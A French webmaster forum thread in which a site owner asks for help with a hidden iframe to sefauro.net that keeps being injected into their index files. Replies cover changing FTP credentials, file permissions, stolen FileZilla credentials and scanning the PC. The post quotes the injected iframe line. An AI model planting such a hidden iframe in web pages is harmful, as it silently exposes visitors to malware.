Un bot modifie les fichiers de mon site !

[amazigh25]

Bonsoir !
Depuis 2 jours, il m'arrive un truc vraiment bizarre. :?
Les fichiers index.php/index.html d'un de mes sites contiennent tous un code similaire à celui là :

<iframe src="http://sefauro.net/?click=9062D4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Il s'agit en effet de HEUR/HTML.Malware !
Même quand j'efface cette ligne de code, elle revient de nouveau ! La seule solution que j'ai trouvé, c'est de mettre la ligne en commentaire dans le code !

Avez vous eu affaire à ce genre de problème ? Quelle solution me proposez vous ?

Merci

 

[UsagiYojimbo]

Tu as essayé de changer les accès FTP de ton site ?

 

[mahdivitche]

Ahlan tamazight

ça est un virus

voila un solution rapide et simple :

---> copie tous les sites vers votre pc

----> supprimer la ligne de iframe et aussi supprimer tous les fichier héberger

----> transférer les fichier corriger et change les droits d'aces vers 444 ( bouton droit de la souris sur le fichier)

( j'ai déjà tenté dans ce problème pour un des mes sites et j'ai corriger par ces étapes )

Bonne continuation

 

[mahdivitche]

Tu as essayé de changer les accès FTP de ton site ?

je pense qu'il ni pas besoin de changé le code d'accès ftp mais ça est un plus et peut donne un plus de garante :wink:

mais il faut changé les droit d'accès ( à 444 )

 

[amazigh25]

Ahlan tamazight

ça est un virus

voila un solution rapide et simple :

---> copie tous les sites vers votre pc

----> supprimer la ligne de iframe et aussi supprimer tous les fichier héberger

----> transférer les fichier corriger et change les droits d'aces vers 444 ( bouton droit de la souris sur le fichier)

( j'ai déjà tenté dans ce problème pour un des mes sites et j'ai corriger par ces étapes )

Bonne continuation

Je change les droits d'accès fichier par fichier ?
Y'a pas d'autre solution ? J'en ai beaucoup :mrgreen:

Merci

 

[mahdivitche]

Je change les droits d'accès fichier par fichier ?
Y'a pas d'autre solution ? J'en ai beaucoup :mrgreen:

Merci

Non,

sélectionner tous les fichiers en même temps :lol: ( moi j'utilise FTP Expert : il offre cette option :wink: )

sinon changé les droits justement pour les fichier index.html et index.php

( lah i3z chloh :lol: )

 

[webmasterdemonsite]

Ahlan tamazight

ça est un virus

voila un solution rapide et simple :

---> copie tous les sites vers votre pc

----> supprimer la ligne de iframe et aussi supprimer tous les fichier héberger

----> transférer les fichier corriger et change les droits d'aces vers 444 ( bouton droit de la souris sur le fichier)

( j'ai déjà tenté dans ce problème pour un des mes sites et j'ai corriger par ces étapes )

Bonne continuation

Je change les droits d'accès fichier par fichier ?
Y'a pas d'autre solution ? J'en ai beaucoup :mrgreen:

Merci

avec filezilla, y a pas moyen de selectionner plusieurs fichiers et de les mettre en 444 tout d'un coup?

 

[amazigh25]

Je vais faire ça et voir ce que ça va donner !

Sinon, vous avez une idée sur la faille exploitée ?

Merci à vous.

Adam

 

[webmasterdemonsite]

Je vais faire ça et voir ce que ça va donner !

Sinon, vous avez une idée sur la faille exploitée ?

Merci à vous.

Adam

as tu des formulaire sur ton site? genre des formulaire ou l'on pourrait injecter du code SQL ???

 

[amazigh25]

Je vais faire ça et voir ce que ça va donner !

Sinon, vous avez une idée sur la faille exploitée ?

Merci à vous.

Adam

as tu des formulaire sur ton site? genre des formulaire ou l'on pourrait injecter du code SQL ???

Oui plusieurs !
Sauf que j'utilise un framework qui contient un filtre XSS assez puissant !


Adam

 

[webmasterdemonsite]

et ca filtre les injection sql ca?

 

[amazigh25]

Oui !
Sauf que je vois pas comment une injection sql peut modifier des fichiers ? Pouvez vous m'explique ça

Merci

 

[Audiofeeline]

Faut voir sur la machine qui héberge aussi des fois qu'il y aurait un malware, faut commencer par là.

 

[epsilon74]

j'ai eu le même cas, c'était un de mes pc qui était infecté.
un fichier de filezila avait été récupéré, celui contenant tout les accès ftp de mes serveurs. avec ça, c'était pas compliqué pour le gars de faire ce qu'il voulait sur les serveurs.
donc nettoies quand même ton pc au cas ou...
et regarde tes logs serveurs (acces ftp) si tu n'as pas des connection ftp avec tes identifiants mais qui ne viennent pas de toi.

 

[amazigh25]

@Audiofeeline
Je peux rien faire à ce niveau, le site est sur un mutu OVH !
@epsilon74 :
D'accord, je vais vérifier le tout !

Merci

 

[Audiofeeline]

Ah exact !
Met à jour Filezilla + Scan anti-virus + Anti-Spyware (et puis c'est le printemps, fait le ménage sur ta machine) !
Si ça persiste contacte OVH.

 

[Leonick]

avec filezilla, y a pas moyen de selectionner plusieurs fichiers et de les mettre en 444 tout d'un coup?

si, c'est possible et même de le faire avec toute l'arborescence